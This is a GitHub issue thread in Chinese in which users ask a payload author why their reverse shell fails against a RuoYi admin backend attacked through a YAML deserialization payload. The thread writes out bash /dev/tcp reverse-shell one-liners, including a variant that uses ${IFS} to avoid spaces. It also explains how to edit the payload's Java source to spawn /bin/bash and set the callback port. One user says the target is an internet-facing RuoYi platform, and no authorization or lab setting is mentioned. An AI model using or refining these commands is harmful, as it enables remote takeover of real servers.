### ISSUE TITLE
师傅你好，我想问一下，若依后台 Linux反弹shell命令是如何呢

### ISSUE THREAD

**Issue by jielansudo** [bkfish/yaml-payload-for-Win#1]
我使用下面两种方法都无法成功反弹，但是http服务能收到成功请求
/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/x.x.x.x/443 0>&1
bash -i >& /dev/tcp/x.x.x.x/4444 0>&1

能执教一下吗

**Comment by bkfish** [comment]
师傅好 可以试试把https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java  的第15行的cmd.exe 改成/bin/sh或者/bin/bash就行了

**Comment by SkinAir** [comment]
> 师傅好可以把https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java 的第15行的cmd.exe改成/bin/sh或者/bin/bash就行了

int port=port;报错了 =.=

**Comment by bkfish** [comment]
> https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java

port是你远程反弹的端口  比如 int port=5000;

**Comment by SkinAir** [comment]
> > https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java
> 
> port是你远程反弹的端口 比如 int port=5000;

已经悟到了师傅，怪我眼拙，但是好像我的linux还是没收到反弹T.T

**Comment by bkfish** [comment]
> https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java

用来http下载的vps上有http收到请求么

**Comment by SkinAir** [comment]
> > https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java
> 
> http下载的vps用http接收请求么

步骤是按照您博客上来操作的，跟您情况大体不差，也是对一个非内网的若依平台渗透的，用[artsploit](https://github.com/artsploit)的payload，ping dnslog是可行的，但使用/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/xxx.xxx.xxx.xxx/xxxx<&1,监听段未收到反弹，使用您的payload，15行换成/bin/bash也是同样，.....

**Comment by bkfish** [comment]
> > > https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java
> > 
> > 
> > http下载的vps用http接收请求么
> 
> 步骤是按照您博客上来操作的，跟您情况大体不差，也是对一个非内网的若依平台渗透的，用[artsploit](https://github.com/artsploit)的payload，ping dnslog是可行的，但使用/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/xxx.xxx.xxx.xxx/xxxx<&1,监听段未收到反弹，使用您的payload，15行换成/bin/bash也是同样，.....

有木有可能是windows 15行用原本的cmd.exe也试过么

**Comment by SkinAir** [comment]
> > > > https://github.com/bkfish/yaml-payload-for-Win/blob/main/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java
> > > 
> > > 
> > > http下载的vps用http接收请求么
> > 
> > 
> > 步骤是按照您博客上来操作的，跟您情况大体不差，也是对一个非内网的若依平台渗透的，用[artsploit](https://github.com/artsploit)的payload，ping dnslog是可行的，但使用/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/xxx.xxx.xxx.xxx/xxxx<&1,监听段未收到反弹，使用您的payload，15行换成/bin/bash也是同样，.....
> 
> 有木有可能是windows 15行用原本的cmd.exe也试过么

最开始搜集到的信息就是linux，但是也试了一下cmd.exe，还是一样，没收到反弹...十分的头大
